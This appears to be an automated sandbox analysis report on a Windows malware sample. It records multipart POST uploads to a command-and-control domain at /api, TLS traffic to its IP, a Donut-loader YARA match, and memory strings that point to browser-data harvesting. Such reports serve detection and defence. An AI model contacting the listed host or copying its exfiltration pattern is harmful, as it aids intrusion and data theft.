Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6WAPLLJ9IQMTDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1203Host: erectystickj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=89RV4H5A7CXBFVERRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 578855Host: erectystickj.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: erectystickj.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: erectystickj.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: erectystickj.click

Source: RIMz2N1u5y.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: RIMz2N1u5y.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RIMz2N1u5y.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RIMz2N1u5y.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: RIMz2N1u5y.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: RIMz2N1u5y.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RIMz2N1u5y.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RIMz2N1u5y.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: RIMz2N1u5y.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: RIMz2N1u5y.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: RIMz2N1u5y.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: RIMz2N1u5y.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: RIMz2N1u5y.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: RIMz2N1u5y.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: RIMz2N1u5y.exe	String found in binary or memory: http://www.giantmatrix.com/sp/getdip.php
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: RIMz2N1u5y.exe, 00000000.00000003.2312296740.000000000364B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RIMz2N1u5y.exe, 00000000.00000003.2370565230.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click
Source: RIMz2N1u5y.exe, 00000000.00000002.2441834576.0000000000959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/
Source: RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2338758204.00000000009E2000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2339765388.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2364517659.00000000009E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/1E
Source: RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009E2000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/QD
Source: RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009E2000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/QE
Source: RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/api
Source: RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000958000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/api1wq#
Source: RIMz2N1u5y.exe, 00000000.00000003.2337043416.000000000361A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/apiL
Source: RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/apiNGI
Source: RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2370063721.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2338758204.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2339765388.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2364517659.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/apiPr39
Source: RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/apiWine9
Source: RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/apiY
Source: RIMz2N1u5y.exe, 00000000.00000003.2418065735.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2370063721.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2364517659.00000000009DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/apidb
Source: RIMz2N1u5y.exe, 00000000.00000003.2265320671.0000000000975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/apip
Source: RIMz2N1u5y.exe, 00000000.00000002.2441834576.00000000009EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/apisT
Source: RIMz2N1u5y.exe, 00000000.00000003.2364685948.0000000000959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click/rl#
Source: RIMz2N1u5y.exe, 00000000.00000003.2385586543.00000000009C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://erectystickj.click:443/api
Source: RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/Jcl8087.pas
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclBase.pas
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclDateTime.p
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclFileUtils.
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclIniFiles.p
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclLogic.pas
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclMath.pas
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclMime.pas
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclRTTI.pas
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclResources.
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclStreams.pa
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclStrings.pa
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSynch.pas
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSysInfo.pa
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclSysUtils.p
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclUnitVersio
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/common/JclWideString
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclConsole.p
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclRegistry.
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclSecurity.
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclShell.pas
Source: RIMz2N1u5y.exe	String found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-1.102-Build3072/jcl/source/windows/JclWin32.pas
Source: RIMz2N1u5y.exe, 00000000.00000003.2313513999.0000000003731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: RIMz2N1u5y.exe, 00000000.00000003.2313513999.0000000003731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RIMz2N1u5y.exe, 00000000.00000003.2266208262.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RIMz2N1u5y.exe, 00000000.00000003.2266129518.000000000365D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RIMz2N1u5y.exe, 00000000.00000003.2313371708.0000000003648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: RIMz2N1u5y.exe, 00000000.00000003.2313371708.0000000003648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: RIMz2N1u5y.exe, 00000000.00000003.2313513999.0000000003731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: RIMz2N1u5y.exe, 00000000.00000003.2313513999.0000000003731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: RIMz2N1u5y.exe, 00000000.00000003.2313513999.0000000003731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RIMz2N1u5y.exe, 00000000.00000003.2336994289.00000000009F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.154.166:443 -> 192.168.2.6:49768 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe

Code function: 0_2_008BF884 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

0_2_008BF884

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008707CF	0_2_008707CF
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008BF884	0_2_008BF884
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A80DC	0_2_008A80DC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0089C0E3	0_2_0089C0E3
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087A0FC	0_2_0087A0FC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00870000	0_2_00870000
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008BD02C	0_2_008BD02C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A6039	0_2_008A6039
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008AF07C	0_2_008AF07C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087B1CC	0_2_0087B1CC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008BC154	0_2_008BC154
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A72BC	0_2_008A72BC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0089B20C	0_2_0089B20C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087820C	0_2_0087820C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0088B26C	0_2_0088B26C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008AE33C	0_2_008AE33C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0088E36C	0_2_0088E36C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008AA44C	0_2_008AA44C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A546D	0_2_008A546D
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0088F58C	0_2_0088F58C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008BC58C	0_2_008BC58C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008895C7	0_2_008895C7
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0088D5F2	0_2_0088D5F2
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087751C	0_2_0087751C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087552C	0_2_0087552C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087C54C	0_2_0087C54C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087460C	0_2_0087460C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A763C	0_2_008A763C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00899677	0_2_00899677
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008AE70C	0_2_008AE70C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087680C	0_2_0087680C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087F827	0_2_0087F827
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0089C0E3	0_2_0089C0E3
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008AE9AC	0_2_008AE9AC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008839DC	0_2_008839DC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A29DC	0_2_008A29DC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008779DC	0_2_008779DC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0089C9E1	0_2_0089C9E1
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0089D900	0_2_0089D900
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087AA8C	0_2_0087AA8C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00889A96	0_2_00889A96
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A6AFC	0_2_008A6AFC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00892A5C	0_2_00892A5C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0088EBFC	0_2_0088EBFC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00874B2C	0_2_00874B2C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008AEC9C	0_2_008AEC9C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00888CD7	0_2_00888CD7
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0087ACEC	0_2_0087ACEC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00894CFC	0_2_00894CFC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008BBD84	0_2_008BBD84
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00892DBC	0_2_00892DBC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0089FDCA	0_2_0089FDCA
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A0DEC	0_2_008A0DEC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008AADFC	0_2_008AADFC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008A6D5C	0_2_008A6D5C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0089CD70	0_2_0089CD70
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00877D7C	0_2_00877D7C
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_008BAE90	0_2_008BAE90
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00890EC8	0_2_00890EC8
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_0088EECC	0_2_0088EECC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00896ECC	0_2_00896ECC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00875EDC	0_2_00875EDC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00887EF3	0_2_00887EF3
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00878FEC	0_2_00878FEC
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00882F7A	0_2_00882F7A
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: 0_2_00886F72	0_2_00886F72

Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: String function: 00885C7C appears 49 times
Source: C:\Users\user\Desktop\RIMz2N1u5y.exe	Code function: String function: 00879B3C appears 74 times

Source: RIMz2N1u5y.exe

Static PE information: invalid certificate

Source: RIMz2N1u5y.exe, 00000000.00000000.2117845309.0000000000525000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs RIMz2N1u5y.exe
Source: RIMz2N1u5y.exe, 00000000.00000000.2117878753.000000000053C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename8 vs RIMz2N1u5y.exe
